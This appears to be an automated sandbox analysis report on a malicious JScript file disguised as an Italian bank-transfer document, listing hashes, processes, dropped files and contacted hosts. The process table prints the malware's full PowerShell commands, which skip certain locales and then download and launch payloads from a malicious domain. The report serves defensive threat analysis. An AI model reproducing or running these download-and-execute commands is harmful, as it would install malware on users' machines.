File name: | 2019 0711-Eseguito_Bonifico_Europeo_Unico_0000_11075 xm.js |
Full analysis: | https://app.any.run/tasks/1adee127-4349-4867-bb35-1beed695fdb8 |
Verdict: | Malicious activity |
Analysis date: | March 21, 2019, 14:36:35 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Indicators: | |
MIME: | text/plain |
File info: | ASCII text, with CRLF, LF line terminators |
MD5: | 467A15BBBD84943DD7035DF856EE5F07 |
SHA1: | 64BA2288C6807AA3FDCFB67017A98A7C5903840E |
SHA256: | BA03B218B8D79A8670928F207D43C5AD6EB61619AB328F94404C176CD2D13863 |
SSDEEP: | 96:IAe/Kcjr1RpxSc+uu27qG9galQpehaHyscYuOpZJY/3k5At05hG0xkhZmauTZy:GCcjr3pxR+A7qG96yxaZC/KAtXhSTZy |
PID | CMD | Path | Indicators | Parent process
---|---|---|---|---
2936 | `"C:\Windows\System32\WScript.exe" "C:\Users\admin\AppData\Local\Temp\2019 0711-Eseguito_Bonifico_Europeo_Unico_0000_11075 xm.js"` | C:\Windows\System32\WScript.exe | — | explorer.exe
 | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Microsoft ® Windows Based Script Host; Exit code: 0; Version: 5.8.7600.16385 | | |
4060 | `"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" if( (Get-UICulture).Name -match 'RU\|UA\|BY\|CN'){ exit; } $cvswesib = [System.IO.Path]::GetTempPath() + '\SearchI32.js'; ( New-Object System.Net.WebClient ).DownloadFile('http://cloud.kokoheadattorney.com/502?ijwyujfdawybbwxaaisjvxgj',$cvswesib); Start-Process $cvswesib;` | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | | WScript.exe
 | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Windows PowerShell; Exit code: 1; Version: 6.1.7600.16385 (win7_rtm.090713-1255) | | |
2184 | `"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" if( (Get-UICulture).Name -match 'RU\|UA\|BY\|CN'){ exit; } $jwciad = [System.IO.Path]::GetTempPath() +'\..' +'\' + 'Dropbo.exe'; ( New-Object System.Net.WebClient ).DownloadFile('http://cloud.kokoheadattorney.com/501?vjswiccxcagi',$jwciad); Start-Process $jwciad;` | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | | WScript.exe
 | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Windows PowerShell; Exit code: 1; Version: 6.1.7600.16385 (win7_rtm.090713-1255) | | |
PID | Process | Filename | Type | MD5 | SHA256
---|---|---|---|---|---
4060 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\W4T65QZLK6AN907PY2N5.temp | — | — | —
2184 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\42831HSOFOSCBZ1WL60H.temp | — | — | —
4060 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF100784.TMP | binary | 16D0FD6E07266B2C15A9D7BC6623F506 | 833367DC50386D139010182CEDE41B4D055F8D463626EC4005652528B3E0871B
4060 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | 16D0FD6E07266B2C15A9D7BC6623F506 | 833367DC50386D139010182CEDE41B4D055F8D463626EC4005652528B3E0871B
2184 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF1007a3.TMP | binary | 16D0FD6E07266B2C15A9D7BC6623F506 | 833367DC50386D139010182CEDE41B4D055F8D463626EC4005652528B3E0871B
2184 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | 16D0FD6E07266B2C15A9D7BC6623F506 | 833367DC50386D139010182CEDE41B4D055F8D463626EC4005652528B3E0871B
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
2184 | powershell.exe | 31.214.157.69:80 | cloud.kokoheadattorney.com | easystores GmbH | NL | suspicious |
4060 | powershell.exe | 31.214.157.69:80 | cloud.kokoheadattorney.com | easystores GmbH | NL | suspicious |
Domain | IP | Reputation
---|---|---
cloud.kokoheadattorney.com | | malicious
dns.msftncsi.com | | shared